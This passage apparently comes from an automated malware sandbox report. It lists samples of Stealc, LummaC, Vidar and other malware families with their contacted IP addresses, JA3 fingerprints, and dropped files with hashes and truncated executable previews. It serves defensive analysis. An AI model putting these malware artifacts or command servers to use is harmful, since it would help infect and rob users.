	file.exe	Get hash	malicious	RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	176.113.115.33
	http://Warehousingpro.com	Get hash	malicious	Unknown	Browse	37.9.4.115
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	84.38.182.221
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	37.9.4.189
	file.exe	Get hash	malicious	Stealc	Browse	176.113.115.187
CLOUDFLARENETUS	rfc[1].html	Get hash	malicious	Unknown	Browse	104.18.86.42
	rPedidoactualizado.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	172.67.140.92
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	172.67.140.92
	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.DownLoader47.43340.27469.30352.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	https://starylasfe.com.de/6SZZr/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	2ngxhElaud.exe	Get hash	malicious	Xmrig	Browse	172.67.173.168
	copyright_infringement_evidence_1.exe	Get hash	malicious	Unknown	Browse	172.67.158.129
TNNET-ASTNNetOyMainnetworkFI	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	MmcJhaiYNh.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	XQywAEbb9e.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.150
	Aew8SXjXEb.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	RJQySowVRb.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	0h5IfpqflF.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.159

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	rPedidoactualizado.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.179.207
	T2bmenoX1o.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.179.207
	ArT23Ix6Ox.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	cqKYl7T4CR.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	ArT23Ix6Ox.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	cqKYl7T4CR.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	SecuriteInfo.com.FileRepMalware.12793.28433.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.67.179.207
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.179.207
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.179.207
	out.exe	Get hash	malicious	Vidar	Browse	172.67.179.207

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\773416\Welding.pif	down.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Stealc, Vidar	Browse
	InstallSetup.exe	Get hash	malicious	Stealc	Browse
	bomb.exe	Get hash	malicious	Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar	Browse
	66fd8d779da5e_EscortsRadios.exe	Get hash	malicious	Unknown	Browse
	66fd8d779da5e_EscortsRadios.exe	Get hash	malicious	Unknown	Browse
	zSHXL8jq8M.exe	Get hash	malicious	LummaC	Browse
	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_478F.tmp.exe_b15f1ed1fbe05deb7bf8632b253ff5c7eae35c3_ce0698c2_34045723-5be5-429e-9efc-972a5ba8c6e1\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9637728796907556
Encrypted:	false
SSDEEP:	192:NTHpQCZt0HetVjBmZroZtzuiF3Z24IO8N:55ZuHetVjTTzuiF3Y4IO8N
MD5:	D07B0C692FC26D95364DF0D31FE5A7C0
SHA1:	E7086B608A957FAEFAAF2331425C62A99AF2A3F9
SHA-256:	B0C596B88D6C3FBEAD4541E6A0E2EC903129EC9013EE9260F57DEAC12CBE721E
SHA-512:	0CAB9C64BA8E3FB640D8601AC039B274C8F90BE4E0ABB58BAB7064A85663067E9B3BE1E9787674874C805F6979EC309C5BC5D389CD2784FE91110968C3ABC89C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.5.9.6.7.5.5.3.6.7.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.2.5.9.6.7.9.7.5.5.6.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.0.4.5.7.2.3.-.5.b.e.5.-.4.2.9.e.-.9.e.f.c.-.9.7.2.a.5.b.a.8.c.6.e.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.d.f.c.a.8.f.-.3.e.5.9.-.4.4.9.1.-.b.3.9.c.-.a.1.e.1.4.e.6.b.c.4.2.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.7.8.F...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.a.0.-.0.0.0.1.-.0.0.1.4.-.f.1.4.5.-.b.9.c.4.2.4.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.b.4.0.a.3.2.3.c.1.3.e.2.9.e.5.b.6.c.4.2.a.6.2.2.9.1.9.6.b.d.9.0.0.0.0.f.f.f.f.!.0.0.0.0.e.6.7.5.a.d.9.0.c.1.6.4.2.4.4.b.a.c.1.c.3.a.5.c.b.a.c.c.9.3.2.e.9.e.0.b.3.a.8.d.!.4.7.8.F...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D33.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 8 01:52:47 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	65376
Entropy (8bit):	2.0059661375414857
Encrypted:	false
SSDEEP:	192:4VkorlmX/rdElxzIXHkOROswI4RpxMlS2N8LOXoDO3hxntLcQuEmnOAm5zsRxnby:BopUrd8BERRgpxn2+OXd3hDuDmBuAAPo
MD5:	16EC14423A6AA33001D49A21CB55D3F9
SHA1:	5A288D4A6219054E0330E1590202CF52CDEFA856
SHA-256:	AADCEA81393B07389AA0E8A1ABA4895A977F20F24F0E30C1632C43A1885A6847
SHA-512:	3891881A755EE5C6C2606DDDEE30AB4BA6255EC4234B01B29E9860EB8C88CAA4A8CBC6D63BCCF5E27EF5DE811D7DCC91F21852BCA371D13C8C68C47C3E0399BB
Malicious:	false
Preview:	MDMP..a..... .......o..g............4...............<............*..........T.......8...........T............3..........................................................................................................eJ......H.......GenuineIntel............T...........l..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DFF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8300
Entropy (8bit):	3.6919677532345903
Encrypted:	false
SSDEEP:	192:R6l7wVeJMc6Znz06YA36jXgmf4+XpDx89biYsf/lWm:R6lXJH6Zno6Y46Tgmf4+siLf/9
MD5:	DA520B126AC6FEBD9608D93D687BBCEC
SHA1:	E1F4BCA2F96E68A075964A59BAA99B1F283AC68F
SHA-256:	4C190CF3E9E7B5B1F8894025A70932FCFFD038F3890C32A443940E095C50C614
SHA-512:	21B2DEA80F84B99A418BE6BA04D8C55B15FCE6C4C01D48CB0C79A610B5963D70B5981BF2B702A199CBD85A82D58DDC9125571457CC131CD78DB1F2E3AD9E87EF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E3E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4565
Entropy (8bit):	4.441023446744003
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHJg77aI9GpWpW8VYrYm8M4JpRIaFP8t+q84IjT7kd1GsWX7d:uIjfpI7YY7V7JpjqIT7kTGso7d
MD5:	229FD2812226868C51A1BDF5086664CD
SHA1:	62095D31CB484B06425142F01587CAC9F7B1785C
SHA-256:	ACE77BF49894C3EC4E822268DF5D8B855578C3200255141FA618453C66AEF7C2
SHA-512:	1293DC83024408C39839B95A0417E4AE091BF30E67F0581216606732EA2B6118587B31AC9FBF2A842734BC51FC5CD8E7643B44F6B6200E019539298F120493E5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\773416\Welding.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	454144
Entropy (8bit):	6.356567276473533
Encrypted:	false
SSDEEP:	6144:2odLe5UeS/3dUS5HaHecUnpYEiA0+IW+Rv82S2knxC9og4gEGy6BbO42T8:Hi5UeS/3hxaHeRYTA09Zv8znxINO4O
MD5:	E35C6AD41081DDCDA2BA9C65B5B1A6F8
SHA1:	E675AD90C164244BAC1C3A5CBACC932E9E0B3A8D
SHA-256:	100F1C346CBCFF15F4D9D75C791000625850E1C82B44CE9427CCF441F5C3CB79
SHA-512:	D200ED497D6345E0EBE1B56887100FCEB7B7333D1BFDCC68C5B7B4DD38AD71E1AE9331F6E1D4D23D480348090AE1D87D17323C58AE2C6AC6B02B97940E9405A2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 38%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L...P#.e.............................;............@...........................&.............................................@...x......................................................................@............................................text............................... ..`.rdata.............................@..@.data............`..................@....jozizud............................@..@.raxup..............................@..@.maweb..............................@....rsrc..... .........................@..@........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\773416\Welding.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	454144
Entropy (8bit):	6.356567276473533
Encrypted:	false
SSDEEP:	6144:2odLe5UeS/3dUS5HaHecUnpYEiA0+IW+Rv82S2knxC9og4gEGy6BbO42T8:Hi5UeS/3hxaHeRYTA09Zv8znxINO4O
MD5:	E35C6AD41081DDCDA2BA9C65B5B1A6F8
SHA1:	E675AD90C164244BAC1C3A5CBACC932E9E0B3A8D
SHA-256:	100F1C346CBCFF15F4D9D75C791000625850E1C82B44CE9427CCF441F5C3CB79
SHA-512:	D200ED497D6345E0EBE1B56887100FCEB7B7333D1BFDCC68C5B7B4DD38AD71E1AE9331F6E1D4D23D480348090AE1D87D17323C58AE2C6AC6B02B97940E9405A2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 38%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L...P#.e.............................;............@...........................&.............................................@...x......................................................................@............................................text............................... ..`.rdata.............................@..@.data............`..................@....jozizud............................@..@.raxup..............................@..@.maweb..............................@....rsrc..... .........................@..@........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\773416\A

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	664852
Entropy (8bit):	7.999681247621779
Encrypted:	true
SSDEEP:	12288:+znf6Ro1VL5SFkB/MP6l84ds48BBqe0JKVV0Z/QamqKV4JWkB:in3V1RxM4d0BBmKAZbmn4IK
MD5:	DF745BE339BBF748CF1D17FB8C06B640
SHA1:	B66A902635B9F136ACE5A959F6C71E74F3F46AB9
SHA-256:	FDB35C26DF7FA1EDC203E2A31469ED59BA3C36CF21961C40339FC27ADB619B6B
SHA-512:	B9B1A66370BACCE29E6E1E5EA16A3B59E9DA213A88248F40CD4153188EABEBD9D4E0BEBB9BE9132C640769D18A0491C88D93CBAA97FE41634353083565629F4B
Malicious:	false
Preview:	..{.....@.....FPh......&.o.\'.4..n..........5..L..@w...R...?.zk...j.E.v..q....fv}.Y}C.QZc..e.2..6....d.dn..:...@'.Hv..I....&pm.Rvo.%...{..e.....>.....?.a......=...6/..r....,./..."..R....e...z......sA..bX5H..X?3......d~+...)..,..sy2...=.=O..z..... .Y.q].3..H<.OE......\.`&......T.+........p.e@.........B.....`Z.g..m...7.#.%.Y8..ob'p$X".~..<................yi.'..3#B...b..."\......G..h.'..R.t..\|&.s....I....R)...2....._..j6]..D.5..J..QOzO..NV.A.....H.M\|.'...m3.\.7.YR.b..L..y...+2...c.k!)..n...9.<J..............y:)0t.;.8(..o.......s......{.\|..k......H.....Z.n...?..)..?...BW.W;.~....b...K"......c......:...N.>.....m.14F...Q..\h....7]..'.4:..}....`...F.2....]a.FP.Q"E........I.b.(.b..S}.>......7\|."......&.Yd.S.....\.C.......!i.c......Bp,f/.[..gpMS ........Q..]C.A.....i.ni-.D;>d...X....J'...p?\|.....9...d..4]Y..".v.Z..J.l.;...,........q...S..Me.,.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jx

C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 11%, Browse
Joe Sandbox View:	Filename: down.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: InstallSetup.exe, Detection: malicious, Browse Filename: bomb.exe, Detection: malicious, Browse Filename: 66fd8d779da5e_EscortsRadios.exe, Detection: malicious, Browse Filename: 66fd8d779da5e_EscortsRadios.exe, Detection: malicious, Browse Filename: zSHXL8jq8M.exe, Detection: malicious, Browse Filename: nJohIBtNm5.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Bangladesh

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	7.996381249592701
Encrypted:	true
SSDEEP:	1536:i6JuRrNyk3brTVlnk08mfh0hQ2mTPu5n8A1YPCNMwdvYtf:/uRhxlk08mfShrmTm5nx1vtdm
MD5:	FDAE88ED4CC045029526C2128F948C77
SHA1:	4BC37DA56AE2B8CC2A0698F7E0DCECAD9CE6FF00
SHA-256:	B6594677913CAB2A65A6181B9F3BE75354482771C897D023EDFD739EB4741D22
SHA-512:	2C9B3986FD45060DEB42C8DE1DF4629EB61DF9F0DC041E4C49F7FB0A745E62F6B7D87F8BD9028765A1528D8F99FEE1E1F4CF7E0AE1C8E76D3564E9925A52D496
Malicious:	false
Preview:	"=.....v.1........W..L{..[b.YjM..W^.../.a.h.T._.b..5..S..8Kb.M...7m....i..:;!. !.CG..l...Z...h./.z.<;....#b..[nfw..].l.+.m....C...6...1...cj.j..>l.#...._}........;P<..=....S.Z...'.%.\...$NF.....^F!...?.)V.g.\'...ASm......S...a...i.....>.cN.2.bv.q...28...).r.......S..~i..{....J.B..2.......d...WN..PPO._..&..d.^...4t...7D$<....Y..Q..6{.Df._....i...]...\x..2..i....(B..R..w..V$^..1.}.L.-....P..o..nK..38/...Y.@.ME.d?$..w%..S.N...-..I &+.....mc4-z.s........'..."...LCu..$7.S5..ThK....Kzt.z....Dj...JJSY.4V6.],3Q.../Li...S#.W.w......jv..:L.3@.n...b_...3xR..w..Q&o.H..~.>l....Yv...W.Z..K1....[..;....5r...qx...{.....Zf....Pl.....0.5r7w......x.z.z....V.N/.l..G...^9...........X.2..n>6..}J[.qC..:t.7......{N[..".......j.EA...."....Cx..bat{O..[.Z.`.....Y.=.O.&..#...<..P.s.f.{.@.a......v.....u..UO{..(f..h.....h(....T..........'.......:+..J).U.g.J.L.OV.h......,...#.G.\|+.)...9..x.....(j.$.....N.?f...ui^).9.D.v.<..6N&{.X....q%..x..."....._.=....D!

C:\Users\user\AppData\Local\Temp\Completely

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	37140
Entropy (8bit):	7.995849718339517
Encrypted:	true
SSDEEP:	768:muujtmw65/eutZFGkDIvYy95ZZdm1InC8I2DOyLTzQcBfS0070Ll4Pdq52Xlre6E:FVxTs249TZ4e1jnQia0vAdnXZeB
MD5:	DE6D628C6065D2A3CE8651EB80632760
SHA1:	B5526B6783518931561027431A68AA912CBE67ED
SHA-256:	49CAD214CB62228E014E65F96FEBBBC3073561E0AD5D654F104D96AD7E702B4D
SHA-512:	30C5078183A6866C5162B5F4B424BACA73258E59FE5B30CA219E4359D791D1E9FED2181C7CBD8C9A5F819CD4B5460369ED3A77E8C66DF86774194451B69FD559
Malicious:	false
Preview:	.A...D2._..s..=........@...yh........3iKf..=.,&.......2.!qR...{../,...~m>...x..2(..C.F.Tk..%..~j..3WT%"!..=.n....gt..{PM.....=..(...(8..]....#......;5..].tE.^d..K.....We.2.NFS.4...m.W.6.M...Bd..@&....I......C.mn)...L-.W..2[.qp.....K.(...E.g....P.Z<..y.1....Jo8...&..7...[.........+.8T...K.z....'r.j7.........e..%..o@.]\.t...`.!Ys.)..qs.q.....J.Y..n...vN.:.s.....X.....X{.v:........G.x.!S....n....y.j.FR8V..O.m..i..~.R.Z...y..}..Z.U......UI..qV..,.m.)..A....../$)..(....`...apk...Bh..8.T......y.E..J.. .r..r=.....".......T-dFV.\|.V.....>x+.6..a._O.gp.j..8.../...N...A.Te......G.P.l...i..~.......}(;[.b...D...)D..{..Fe.:#......;\.pp.)]?...X.M........R....\|q..p..I..AP.k0.#C.oO.<...$..c..C..*.\|o..Ad.>iY.........-..V[.C;[.....7.....n(<..$..Ak.H.....;...5k...27...,.y..W.......y./<..R@".=.0.!zCQ m..@V..........@....@.z.c.B...+?....8....x....T.R"bc...=+F..^..I..'l.O...H.j.cU=.......".W.9p.8.9.3..Q'%......U.N.vG....."..W..7cI\|.%./^..r.W,..w..1..p.ql

C:\Users\user\AppData\Local\Temp\Cool

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	99328
Entropy (8bit):	7.998413817565888
Encrypted:	true
SSDEEP:	3072:9vEgzHAaDJVDlVRmnsyfHuEktwFfcYf3610D+:Jgarx6HJ4CfcYSU+
MD5:	65A71296F130A1730A497507324FB143
SHA1:	324346489DA3C584DB2B5A66BB4ECB03B82E504C
SHA-256:	8993E508819C4695EBA97D4AE46E306554C986DCAEE111F9E39689C0C8C851D9
SHA-512:	A60B3B0AD4468765BB204A70AFE87867AAE3049D6DDBD1594095191C8084C7A690FE996BA81E61DFBFBA8A11F9A9B65B20411601A5FF142D7C4619C84DC258A8
Malicious:	false
Preview:	Mqa...f]B._.0......m.@....q...i....\D,........v..I......-O.[.f......'....G...\.~..9{.+....oh../..../.......K.d.K{k`.FpL2.~.v..........3.....Dm.l.z@%..9A.e..w.7Y1..y....&.\|..k.R......-..Q.I...Mt..xV.Z..J..[.t.....&........g.(.U......F?tB$.x..dE.M...j7kq....7.U.......1!X.>...#".I..y.0...Z@....sa.Qc1..(.E........oh+[.7i?..O..tC.W/.....'.uvwc.7.@Ag..........J.#.Lds.5mZh~...IN....!...4M....7.5uUg{..o..)..:w8...0..1.j{.z....Z...5\|..I>0.U..>......bsgYW7w]..1......=..Pu&[.m.ut.{.... ...3..b...q.....=^.k^...........jJ..c.r...D.2..-En.1...t..hI....` .i...@V.6...6...e#..#.....Q.1...;8.2../^....Q..rq^)..O..=..l.9.>.....Z.....Q..TM6kG....\.V.:...}9.2.%.4..TdI.g.V...k.\|.3....2?J...I.%&v...i.....J .fT..z?1J.-.6R....;..rq.L6....5,...W.L.....X>.[..u#^..Ht...<."UL...W.[....\.A..E....d.Yg.X......1....wp.!.v.....g,zZ....+.+...w...._m.^...}]..P.a;~.\.$....`q...Viu.)....tB.\|.................?y.#..\CwlAZ...0......eI.=..Wg.o.4.L.......`j...;n..L.U.h.

C:\Users\user\AppData\Local\Temp\Diet

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	71680
Entropy (8bit):	7.997112823770312
Encrypted:	true
SSDEEP:	1536:Ej2fwGTvJG6GANMPzKPi2L558QJac44/ebTKvy7PyDeE4YHfIE1idzuU5W7:A2fwcxG6lizKi2dsZg4Gy7PDE4YHfr
MD5:	A5901FBBFFB3B72E1BE2A28489FE74B4
SHA1:	69AD2C778CED4029D46FAD8AAA99AC394D51006A
SHA-256:	AF9206B54BFA4A6BCAF9F2CE6515451C25FE8756FCC65324E0FD2039D85AD0EC
SHA-512:	C148D26449AA3732090223FD572DFC1DA8B280991A1C1CDEB553803E0CCD0ED859B28CDC6C8FDB599944DE53B6A665BE5CE0BD53C110221F21F01C5C5E9F2890
Malicious:	false
Preview:	z.E.x)'.-..4...t.x....'.......#.#.f.t.]..#.$..H0..9Hv..`.....I.1}..&h>2O.Wv.....p..'^........V.....'.N......V.D&H7o.\.%"k.......p.@... ...\nD.S....S.....A...F.l.k....QQYIa...l:..R.\..x..t...'.y......Xc.6{.../.x....L...[.S.sG%.+.+i._%.sc.....!.@..a.F.Y...%..l..U.I`.....&\|D.O=...\|.!A..(. ."r..#.9.L>>.u...G<%........2....9/.)..i.:..a#...t2m6-/.W...B.W......x..o..]...-.Ni....$.....#.. E..8.<.3..c;NV]..q.5.+.........1...c.(.FFB...Fg.}.2z.WkEO.M^.q....M.=8...}.7.B(9Gh....l.8.c..O.Gwf.LB...b..tY\....YA.....6+.3.\lQH...H;.......v.r..v5v....q.D].h...h2...g. ..K]!.h...C[..^...{..[..V.u.%.....X.....n..ge$.1}....V.`.9..LI.N.......3..7.l...4.i..R.(....^.C........pH.!..........<.5..&.0...H/.,...f:..@#.\../....3D..0M.....~......y.C..Fz..X..q..Ge...Tg.4..V....\|.....9l...`..>/73.4.o.A21AK%.)..d.<NI.n.P~Z:.)diq,....K..t6.{...f.A.\Ov;..;....P.E.k..)......K.3...C.....u..T..M.........i.b.....V?v.x_SY...I.DN...G.e6..7.2y.;c?.c...e.i..hH...''S.E..pI....

C:\Users\user\AppData\Local\Temp\Enclosure

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	7.997850327175008
Encrypted:	true
SSDEEP:	1536:TlW89Ou8ZuTPwZ1J0ULG46+TYlapACYKZFw1bxV9zAOdKjlaFdoV:TlWmOLus1JTGOEluvYMe1bPOPhfV
MD5:	DE1ADA156C1E3718157F06C11AF5920F
SHA1:	091AB85826DC3100B518272C18709D035EBED950
SHA-256:	5C94C0B2C717B53F58C815D6277AEEC068606DFD2A8ABD98033B61336D8CE5A9
SHA-512:	D95EA79B5E0E9B923F0D384819CBCFA76605DABF4E6BCF975A79812E88C14802B1FB60A0FD12DFD2EBB23CFBCAB61D30F29279EFED9D5F3404149BF46BC34F58
Malicious:	false
